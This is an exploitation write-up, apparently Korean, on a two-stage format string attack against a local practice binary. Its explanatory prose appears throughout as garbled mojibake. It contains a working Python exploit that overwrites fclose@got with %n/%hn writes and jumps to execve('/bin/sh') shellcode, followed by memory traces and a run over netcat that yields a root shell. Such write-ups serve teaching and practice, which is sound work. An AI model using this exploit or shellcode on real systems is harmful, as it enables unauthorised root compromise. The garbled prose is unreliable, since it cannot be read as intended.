½ºÅÃÆ÷ÀÎÅ͵éÀÌ ¿©·¯ °³ ÀÖÀ¸¸ç ±× Áß¿¡ ÀÓÀÇ·Î 2°³ÀÇ Æ÷ÀÎÅ͸¦ ¼±ÅÃÇØ Exploit¿¡ »ç¿ëÇϱâ·Î Çß´Ù. ----------------------------------------------------------------------------- 0xbffff740: .......... .......... .......... .......... 0xbffff750: .......... .......... .......... .......... 0xbffff760: .......... 0xbffff804 .......... .......... 0xbffff770: 0xbffff7c0 .......... .......... .......... 0xbffff780: .......... .......... .......... .......... 0xbffff790: .......... .......... .......... .......... 0xbffff7a0: .......... .......... .......... .......... 0xbffff7b0: .......... .......... .......... .......... 0xbffff7c0: 0x00000000 .......... .......... .......... 0xbffff7d0: .......... .......... .......... .......... 0xbffff7e0: .......... .......... .......... .......... 0xbffff7f0: .......... .......... .......... .......... 0xbffff800: .......... 0xbffff924 .......... .......... .......................................................................... ----------------------------------------------------------------------------- ÇÁ·Î±×·¥Àº °¨»çÇÏ°Ôµµ ÀÔ·ÂÀ» Àü¿ªº¯¼ö¿¡ ¹Þ¾Æ °íÁ¤ÀûÀÎ ¸Þ¸ð¸®¿¡ ÀÔ·Â °ªÀÌ µé¾î°¡±â ¶§¹®¿¡, ÀÌ ¸Þ¸ð¸®¿¡ SHELLCODE¸¦ ¿Ã¸®°í ±× °÷À¸·Î EIP¸¦ ¹Ù²Ù´Â ¹æ½ÄÀ¸·Î °ø·«ÇÒ °ÍÀÌ´Ù. EIP¸¦ Á¶ÀÛÇÏ´Â ¹æ¹ýÀ¸·Ð fclose@got¿¡ SHELLCODE ÁÖ¼Ò¸¦ Overwrite ¹æ¹ýÀ» »ç¿ëÇÑ´Ù. Payload¸¦ ±¸¼ºÇÏ´Â °úÁ¤Àº 0x02¿¡¼­ ¼³¸íÇßÀ¸¹Ç·Î, Çѹø ´õ ¼³¸íÇϱ⺸´Ü ÀÌ¹Ì ÀÛ¼ºÇÑ ExploitÀ» ºÐ¼®Çϸ鼭 ¼³¸íÀ» ÁøÇàÇÏ°Ú´Ù. ÃÖÁ¾ ExploitÀº ¾Æ·¡¿Í °°´Ù. (* fclose@got´Â 0x0804a00c ÀÌ°í fclose@got¿¡ µ¤¾îÁÙ ½©ÄÚµåÀÇ ÁÖ¼Ò·Î 0x0804a2a0À» »ç¿ëÇÒ °ÍÀÌ´Ù.) ----------------------------------------------------------------------------- #!/usr/bin/python from struct import pack # fclose@got = 0x0804a00c # shellcode addr = 0x0804a2a0 stage_0 = "" stage_0 += "%8x" * 6 # count = 48 (0x30) stage_0 += "%134520796x" # count = 134520844 (0x0804a00c) ; For fclose@got stage_0 += "%n" stage_0 += "%c" * 2 # count = 134520846 (0x0804a00e) ; For fclose@got + 2 stage_0 += "%n" stage_1 = "" stage_1 += "%24562x" # count = 134545408 (0x08050000) ; For 0x0000 stage_1 += "%8x" * 17 # count = 134545544 (0x08050088) ; length = 136 stage_1 += "%1916x" # count = 134547460 (0x08050804) ; For 0x0804 stage_1 += "%hn" stage_1 += "%8x" * 15 # count = 134547580 (0x0805087c) ; length = 120 stage_1 += "%39460x" # count = 134587040 (0x0805a2a0) ; For 0xa2a0 stage_1 += "%hn" SHELLCODE = "" SHELLCODE += "\x90" * (1024 - len(stage_0+stage_1) - 25 - 1) # 25 = length of shellcode SHELLCODE += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" # execve("/bin/sh" , {"sh"} , 0) shellcode payload = stage_0 + stage_1 + SHELLCODE print payload ----------------------------------------------------------------------------- Payload·Î´Â Stage0 , Stage1 , NOP + SHELLCODE ÀÌ·¸°Ô Å©°Ô ¼¼ ºÎºÐÀ¸·Î ³ª´©¾îÁø´Ù. NOP + SHELLCODE°¡ ÃÖÁ¾ÀûÀ¸·Î ½ÇÇà½Ãų SHELLCODEºÎºÐÀ̸ç, À§¿¡¼­ ¼³¸íÇßµíÀÌ stage0Àº stage1¿¡¼­ »ç¿ëÇÒ ÀÎÀÚ¸¦ ±¸¼ºÇÏ´Â ºÎºÐÀÌ°í stage1Àº ½ÇÁ¦·Î ¿øÇÏ´Â ÁÖ¼Ò¿¡ µ¥ÀÌÅ͸¦ µ¤¾î¾²´Â ºÎºÐÀÌ´Ù. ÀÌÁ¦ À§ ExploitÀÇ µ¿ÀÛÀ» ºÐ¼®ÇÏ¸ç ¼³¸íÇÒ °ÍÀÌ´Ù. ¼³¸íÀº fprintfÇÔ¼ö¿¡¼­ Format String ExploitÀÌ ÀÛµ¿Çϸ鼭 ¸Þ¸ð¸®ÀÇ º¯È­À§ÁÖ·Î ÁøÇàÇÒ °ÍÀÌ´Ù. (* Æ÷¸Ë½ºÆ®¸µ¿¡ °ýÈ£°¡ ºÙÀº °ÍÀº »ç¿ëµÈ Æ÷¸Ë½ºÆ®¸µÀÌ´Ù) (* count ´Â Ãâ·ÂµÈ ±ÛÀÚ¼ö¸¦ ³ªÅ¸³¿) ----------------------------------------------------------------------------- count = 0 fclose@got (0x0804a00c) = 0x080483e2 0xbffff740: .......... .......... .......... .......... // %8x %8x 0xbffff750: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff760: .......... 0xbffff804 .......... .......... // %134520796x %n %c %c 0xbffff770: 0xbffff7c0 .......... .......... .......... // %n %24562x %8x %8x 0xbffff780: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff790: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff7a0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff7b0: .......... .......... .......... .......... // %8x %8x %8x %1916x 0xbffff7c0: 0x00000000 .......... .......... .......... // %hn %8x %8x %8x 0xbffff7d0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff7e0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff7f0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff800: .......... 0xbffff924 .......... .......... // %39460x %hn .......................................................................... ----------------------------------------------------------------------------- Ãʱ⿡ fclose@got¿¡ ÀÖ´Â ÁÖ¼Ò °ªÀº fclose@plt+6¿¡ ÇØ´çÇÏ´Â 0x080483e2 ÀÌ´Ù. ÇöÀç ¾Æ¹«·± Æ÷¸Ë½ºÆ®¸µµµ »ç¿ëµÇÁö ¾ÊÀº »óÅÂÀÌ´Ù. ----------------------------------------------------------------------------- count = 134520844 (0x0804a00c) // 0x0 -> 0x0804a00c fclose@got (0x0804a00c) = 0x080483e2 0xbffff740: .......... .......... .......... .......... // (%8x) (%8x) 0xbffff750: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x) 0xbffff760: .......... 0xbffff804 .......... .......... // (%134520796x) %n %c %c 0xbffff770: 0xbffff7c0 .......... .......... .......... // %n %24562x %8x %8x 0xbffff780: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff790: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff7a0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff7b0: .......... .......... .......... .......... // %8x %8x %8x %1916x 0xbffff7c0: 0x00000000 .......... .......... .......... // %hn %8x %8x %8x 0xbffff7d0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff7e0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff7f0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff800: .......... 0xbffff924 .......... .......... // %39460x %hn .......................................................................... ----------------------------------------------------------------------------- óÀ½¿¡ 6°³ÀÇ "%8x"¿Í "%134520796x" Æ÷¸Ë½ºÆ®¸µÀÌ »ç¿ëµÇ¾î Ãâ·ÂµÈ ±ÛÀÚÀÇ count´Â 0x0804a00c°¡ µÇ¾ú´Ù. Ãâ·ÂµÈ ±ÛÀÚÀÇ count¸¦ 0x0804a00c(fclose@got)À¸·Î ¸¸µé¾îÁÖ´Â ºÎºÐÀÌ´Ù. ----------------------------------------------------------------------------- count = 134520844 (0x0804a00c) fclose@got (0x0804a00c) = 0x080483e2 0xbffff740: .......... .......... .......... .......... // (%8x) (%8x) 0xbffff750: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x) 0xbffff760: .......... 0xbffff804 .......... .......... // (%134520796x) (%n) %c %c 0xbffff770: 0xbffff7c0 .......... .......... .......... // %n %24562x %8x %8x 0xbffff780: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff790: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff7a0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff7b0: .......... .......... .......... .......... // %8x %8x %8x %1916x 0xbffff7c0: 0x00000000 .......... .......... .......... // %hn %8x %8x %8x 0xbffff7d0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff7e0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff7f0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff800: .......... 0x0804a00c .......... .......... // %39460x %hn (*changed*) .......................................................................... ----------------------------------------------------------------------------- ½ºÅÃÆ÷ÀÎÅÍ ÀÚ¸®¿¡¼­ "%n" Æ÷¸Ë½ºÆ®¸µÀ» »ç¿ëÇß´Ù. "%n"Æ÷¸Ë½ºÆ®¸µÀ¸·Î ÀÎÇØ ÇöÀç±îÁö Ãâ·ÂÇÑ ±ÛÀÚÀÇ countÀÎ 0x0804a00c°¡ ½ºÅÃÆ÷ÀÎÅÍ°¡ °¡¸®Å°´Â ¸Þ¸ð¸®(0xbffff804)¿¡ µ¤¾î¾º¿öÁ³´Ù. ----------------------------------------------------------------------------- count = 134520846 (0x0804a00e) // 0x0804a00c -> 0x0804a00e fclose@got (0x0804a00c) = 0x080483e2 0xbffff740: .......... .......... .......... .......... // (%8x) (%8x) 0xbffff750: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x) 0xbffff760: .......... 0xbffff804 .......... .......... // (%134520796x) (%n) (%c) (%c) 0xbffff770: 0xbffff7c0 .......... .......... .......... // %n %24562x %8x %8x 0xbffff780: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff790: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff7a0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff7b0: .......... .......... .......... .......... // %8x %8x %8x %1916x 0xbffff7c0: 0x00000000 .......... .......... .......... // %hn %8x %8x %8x 0xbffff7d0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff7e0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff7f0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff800: .......... 0x0804a00c .......... .......... // %39460x %hn .......................................................................... ----------------------------------------------------------------------------- 2°³ÀÇ "%c" Æ÷¸Ë½ºÆ®¸µÀÌ »ç¿ëµÇ¾î Ãâ·ÂµÈ ±ÛÀÚÀÇ count°¡ 2Áõ°¡ÇØ 0x0804a00e°¡ µÇ¾ú´Ù. Ãâ·ÂµÈ ±ÛÀÚÀÇ count¸¦ fclose@got+2·Î ¸¸µé¾îÁÖ´Â ºÎºÐÀÌ´Ù. ----------------------------------------------------------------------------- count = 134520846 (0x0804a00e) fclose@got (0x0804a00c) = 0x080483e2 0xbffff740: .......... .......... .......... .......... // (%8x) (%8x) 0xbffff750: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x) 0xbffff760: .......... 0xbffff804 .......... .......... // (%134520796x) (%n) (%c) (%c) 0xbffff770: 0xbffff7c0 .......... .......... .......... // (%n) %24562x %8x %8x 0xbffff780: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff790: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff7a0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff7b0: .......... .......... .......... .......... // %8x %8x %8x %1916x 0xbffff7c0: 0x0804a00e .......... .......... .......... // %hn %8x %8x %8x (*changed*) 0xbffff7d0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff7e0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff7f0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff800: .......... 0x0804a00c .......... .......... // %39460x %hn .......................................................................... ----------------------------------------------------------------------------- ¾Æ±î¿Í´Â ´Ù¸¥ ½ºÅÃÆ÷ÀÎÅÍ ÀÚ¸®¿¡¼­ "%n" Æ÷¸Ë½ºÆ®¸µÀ» »ç¿ëÇß´Ù. "%n" Æ÷¸Ë½ºÆ®¸µÀ¸·Î ÀÎÇØ ÇöÀç±îÁö Ãâ·ÂÇÑ ±ÛÀÚÀÇ countÀÎ 0x0804a00e°¡ ½ºÅÃÆ÷ÀÎÅÍ°¡ °¡¸®Å°´Â ¸Þ¸ð¸®(0xbffff7c0)¿¡ µ¤¾î¾º¿öÁ³´Ù. ----------------------------------------------------------------------------- count = 134545408 (0x08050000) // 0x0804a00e -> 0x08050000 fclose@got (0x0804a00c) = 0x080483e2 0xbffff740: .......... .......... .......... .......... // (%8x) (%8x) 0xbffff750: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x) 0xbffff760: .......... 0xbffff804 .......... .......... // (%134520796x) (%n) (%c) (%c) 0xbffff770: 0xbffff7c0 .......... .......... .......... // (%n) (%24562x) %8x %8x 0xbffff780: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff790: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff7a0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff7b0: .......... .......... .......... .......... // %8x %8x %8x %1916x 0xbffff7c0: 0x0804a00e .......... .......... .......... // %hn %8x %8x %8x 0xbffff7d0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff7e0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff7f0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff800: .......... 0x0804a00c .......... .......... // %39460x %hn .......................................................................... ----------------------------------------------------------------------------- "%24562x" Æ÷¸Ë½ºÆ®¸µÀÌ »ç¿ëµÇ¾î Ãâ·ÂµÈ ±ÛÀÚÀÇ count°¡ 0x08050000ÀÌ µÇ¾ú´Ù. ÆíÀǸ¦ À§ÇØ ±ÛÀÚÀÇ count µÚ ºÎºÐÀ» 0x0000À¸·Î ¸¸µé±â À§ÇÑ ºÎºÐÀÌ´Ù. ----------------------------------------------------------------------------- count = 134547460 (0x08050804) // 0x08050000 -> 0x08050804 fclose@got (0x0804a00c) = 0x080483e2 0xbffff740: .......... .......... .......... .......... // (%8x) (%8x) 0xbffff750: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x) 0xbffff760: .......... 0xbffff804 .......... .......... // (%134520796x) (%n) (%c) (%c) 0xbffff770: 0xbffff7c0 .......... .......... .......... // (%n) (%24562x) (%8x) (%8x) 0xbffff780: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x) 0xbffff790: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x) 0xbffff7a0: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x) 0xbffff7b0: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%1916x) 0xbffff7c0: 0x0804a00e .......... .......... .......... // %hn %8x %8x %8x 0xbffff7d0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff7e0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff7f0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff800: .......... 0x0804a00c .......... .......... // %39460x %hn .......................................................................... ----------------------------------------------------------------------------- 17°³ÀÇ "%8x"¿Í "%1916x" Æ÷¸Ë½ºÆ®¸µÀ» »ç¿ëÇÏ¿© Ãâ·ÂµÈ ±ÛÀÚÀÇ count°¡ 0x08050804°¡ µÇ¾ú´Ù. countÀÇ µÚ ºÎºÐÀ» 0x0804·Î ¸¸µé±â À§ÇÑ ºÎºÐÀÌ´Ù. ----------------------------------------------------------------------------- count = 134547460 (0x08050804) fclose@got (0x0804a00c) = 0x080483e2 // 0x080483e2 -> 0x080483e2 // (ÁÖ¼ÒÀÇ ¾ÕÀÚ¸®¿¡ 0x0804¸¦ µ¤¾î¾º¿üÁö¸¸ ¿ø·¡ 0x0804¶ó¼­ ´Þ¶óÁöÁö ¾ÊÀ½) // (óÀ½¿¡ "´õ ½±°Ô ÇÒ ¼ö Àִµ¥ µ¹·Á¼­ Ç®¾ú´Ù"°í ÇÑ ºÎºÐÀÌ ÀÌ°Í ¶§¹®) 0xbffff740: .......... .......... .......... .......... // (%8x) (%8x) 0xbffff750: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x) 0xbffff760: .......... 0xbffff804 .......... .......... // (%134520796x) (%n) (%c) (%c) 0xbffff770: 0xbffff7c0 .......... .......... .......... // (%n) (%24562x) (%8x) (%8x) 0xbffff780: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x) 0xbffff790: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x) 0xbffff7a0: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x) 0xbffff7b0: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%1916x) 0xbffff7c0: 0x0804a00e .......... .......... .......... // (%hn) %8x %8x %8x 0xbffff7d0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff7e0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff7f0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff800: .......... 0x0804a00c .......... .......... // %39460x %hn .......................................................................... ----------------------------------------------------------------------------- ¾Õ¿¡¼­ ¸¸µé¾îÁØ fclose@got+2 ÁÖ¼Ò°¡ ÀÖ´Â ÀÚ¸®¿¡¼­ "%hn" Æ÷¸Ë½ºÆ®¸µÀ» »ç¿ëÇß´Ù. "%hn" Æ÷¸Ë½ºÆ®¸µÀ¸·Î ÀÎÇØ ÇöÀç±îÁö Ãâ·ÂÇÑ ±ÛÀÚÀÇ countÀÎ 0x08050804¿¡¼­ µÚÀÇ 2byte(0x0804)°¡ fclose@got+2¿¡ µ¤¾î¾º¿öÁø´Ù. ----------------------------------------------------------------------------- count = 134587040 (0x0805a2a0) // 0x08050804 -> 0x0805a2a0 fclose@got (0x0804a00c) = 0x080483e2 0xbffff740: .......... .......... .......... .......... // (%8x) (%8x) 0xbffff750: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x) 0xbffff760: .......... 0xbffff804 .......... .......... // (%134520796x) (%n) (%c) (%c) 0xbffff770: 0xbffff7c0 .......... .......... .......... // (%n) (%24562x) (%8x) (%8x) 0xbffff780: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x) 0xbffff790: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x) 0xbffff7a0: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x) 0xbffff7b0: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%1916x) 0xbffff7c0: 0x0804a00e .......... .......... .......... // (%hn) (%8x) (%8x) (%8x) 0xbffff7d0: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x) 0xbffff7e0: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x) 0xbffff7f0: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x) 0xbffff800: .......... 0x0804a00c .......... .......... // (%39460x) %hn .......................................................................... ----------------------------------------------------------------------------- 15°³ÀÇ "%8x"¿Í "%39460x" Æ÷¸Ë½ºÆ®¸µÀ» »ç¿ëÇÏ¿© Ãâ·ÂµÈ ±ÛÀÚÀÇ count°¡ 0x0805a2a0°¡ µÇ¾ú´Ù. countÀÇ µÚ ºÎºÐÀ» 0xa2a0·Î ¸¸µé±â À§ÇÑ ºÎºÐÀÌ´Ù. ----------------------------------------------------------------------------- count = 134587040 (0x0805a2a0) fclose@got (0x0804a00c) = 0x0804a2a0 // 0x080483e2 -> 0x0804a2a0 0xbffff740: .......... .......... .......... .......... // (%8x) (%8x) 0xbffff750: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x) 0xbffff760: .......... 0xbffff804 .......... .......... // (%134520796x) (%n) (%c) (%c) 0xbffff770: 0xbffff7c0 .......... .......... .......... // (%n) (%24562x) (%8x) (%8x) 0xbffff780: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x) 0xbffff790: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x) 0xbffff7a0: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x) 0xbffff7b0: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%1916x) 0xbffff7c0: 0x0804a00e .......... .......... .......... // (%hn) (%8x) (%8x) (%8x) 0xbffff7d0: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x) 0xbffff7e0: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x) 0xbffff7f0: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x) 0xbffff800: .......... 0x0804a00c .......... .......... // (%39460x) (%hn) .......................................................................... ----------------------------------------------------------------------------- ¾Õ¿¡¼­ ¸¸µé¾îÁØ fclose@got ÁÖ¼Ò°¡ ÀÖ´Â ÀÚ¸®¿¡¼­ "%hn" Æ÷¸Ë½ºÆ®¸µÀ» »ç¿ëÇß´Ù. "%hn" Æ÷¸Ë½ºÆ®¸µÀ¸·Î ÀÎÇØ ÇöÀç±îÁö Ãâ·ÂÇÑ ±ÛÀÚÀÇ countÀÎ 0x0805a2a0¿¡¼­ µÚÀÇ 2byte(0xa2a0)°¡ fclose@got¿¡ µ¤¾î¾º¿öÁø´Ù. fclose@got¿¡ ÀÖ´Â ÁÖ¼Ò °ªÀÌ 0x0804a2a0À¸·Î ¹Ù²î¾ú´Ù. 0x0804a2a0¿¡´Â NOP¿Í SHELLCODE°¡ µé¾îÀֱ⠶§¹®¿¡, ÀÌÁ¦ fclose@plt°¡ È£ÃâµÇ¸é SHELLCODE°¡ ½ÇÇàµÇ¾î ½©À» ¾òÀ» ¼ö ÀÖ´Ù. ÀÌ·ÐÀº ¸ðµÎ ¼º¸³µÇ¾úÀ¸¹Ç·Î, ¹ÙÀ̳ʸ®¸¦ xinetd ¼­ºñ½º·Î µ¹¸° µÚ À§¿¡¼­ Á¦½ÃÇÑ ExploitÀ¸·Î Remote¿¡¼­ °ø°ÝÇغ¸ÀÚ. ----------------------------------------------------------------------------- pwn3r@ubuntu:~/DSFSA$ (./exploit.py ;cat) | nc localhost 7890 id uid=0(root) gid=0(root) ----------------------------------------------------------------------------- °Ì³ª ±ò²ûÇÏ´Ù :) ¹°·Ð Áö±ÝÀº ASLR°ú NX°¡ ²¨Á®ÀÖ´Â »óȲÀ̱⠶§¹®¿¡ °£´ÜÈ÷ SHELLCODE·Î ÇØ°áÇÒ ¼ö ÀÖ¾úÁö¸¸, ASLR°ú NX°¡ ÄÑÁ® ÀÖ¾ú´Ù¸é ROP¸¦ ÀÌ¿ëÇØ °ø°ÝÇß¾î¾ß ÇÒ °ÍÀÌ´Ù. À̷μ­ ½ºÅÿ¡ Á¶ÀÛ °¡´ÉÇÑ °ªÀÌ ¾øÀ½¿¡µµ, FSB payload¸¦ ÀÌ¿ëÇØ ½ºÅÿ¡ »ç¿ë °¡´ÉÇÑ ÀÎÀÚ¸¦ ¸¸µé°í À̸¦ ÀÌ¿ëÇÏ´Â Double Staged Format String AttackÀÌ Áõ¸íµÇ¾ú´Ù. ¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬ ¦¬[0x04 Conclusion]¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬ ÀÌ¹Ì ¾Æ½Ã´Â ºÐµéÀÌ °è½ÇÁöµµ ¸ð¸£Áö¸¸, Á¦°¡ ÆÇ´ÜÇϱ⿡ ¸Å¿ì ȹ±âÀûÀÎ ±â¼úÀÎ °Í °°¾Æ ¹®¼­È­ÇÏ°Ô µÇ¾ú½À´Ï´Ù. ±»ÀÌ "Double Staged Format String Attack"À̶ó°í ¿ë¾î¸¦ ¸¸µç ÀÌÀ¯´Â "ÀÌ°Ç ´ë¹Ú±â¼úÀÌ´Ù" ÀÌ·± Àǹ̷μ­ ÇÑ °ÍÀÌ ¾Æ´Ï¶ó ´ÜÁö ÆíÀǸ¦ À§Çؼ­ÀÔ´Ï´Ù :) ÀÐÀ¸½Å ºÐµéÀº ÀÌ ±â¼úÀ» ÀÌ¿ëÇØ °£Áö³ª´Â Format String ExploitÀ» ÀÛ¼ºÇغ¸½Ã±æ ¹Ù¶ó¸ç, ¹®¼­È­¸¦ Çã¶ôÇØÁֽŠmongiiÇü´Ô²² °¨»ç µå¸³´Ï´Ù. ¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬¦¬